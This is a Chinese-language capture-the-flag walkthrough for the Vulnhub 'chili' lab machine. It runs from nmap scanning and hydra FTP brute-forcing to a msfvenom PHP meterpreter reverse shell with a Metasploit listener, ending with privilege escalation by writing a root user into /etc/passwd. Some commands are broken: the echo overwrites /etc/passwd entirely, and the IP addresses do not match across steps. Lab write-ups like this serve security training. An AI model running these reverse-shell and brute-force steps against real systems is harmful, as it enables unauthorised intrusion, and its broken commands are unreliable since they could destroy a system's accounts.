Vulnhub—chili
靶机下载地址:http://www.vulnhub.com/entry/chili-1,558/
信息收集
扫描网段
nmap -sP 172.16.58.0/24
扫描端口信息及版本信息
nmap -p- 172.16.58.137
nmap -sV 172.16.58.137
访问网站
这里我们访问网页源代码,捕捉到了有用的信息
我们使用cewl工具对网页信息进行爬取并保存到文件中,并将文件中的信息大小写复写,以此作为用户名字典
cewl http://192.168.200.130 > user1.txt
然后通过九头蛇工具暴力破解ftp
破解成功,用户名为:chili 密码为:a1b2c3d4
然后我们登陆ftp
发现我们可以访问网站根目录,查看文件,发现我们对.nano文件具有读写执行权限,我们可以写入一个后门
利用漏洞
生成木马
msfvenom -p php/meterpreter_reverse_tcp LHOST=172.16.58.129 LPORT=4444 -f raw > shell1.php
上传文件
然后我们直接将木马上传到服务器的.nano目录下,使用put命令上传,并给予777的权限
msf反弹shell
然后我们通过msf反弹shell,在kali端口开启监听
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.179.145
run
然后浏览器访问我们的木马
提权
成功拿到靶机的webshell,但是权限不高,我们得进行提权
这里会用到一个工具 enumy64:是一款linux后渗透提权枚举工具,是一个快速的可移植、可执行文件
下载地址:https://github.com/luke-goddard/enumy/releases
直接下载enumy64然后放到kali里即可
然后我们将这个文件上传到靶机上并给予权限
执行脚本
得到信息
通过以上信息,我们发现我们对/etc/passwd文件有写的权限,这里我们可以直接写入一个高权限用户,然后进行登录。
首先通过perl语言生成test用户的密码密文
将自己构造的用户写入/etc/passwd下
echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd
切换用户
切换test用户后就可以找到我们的flag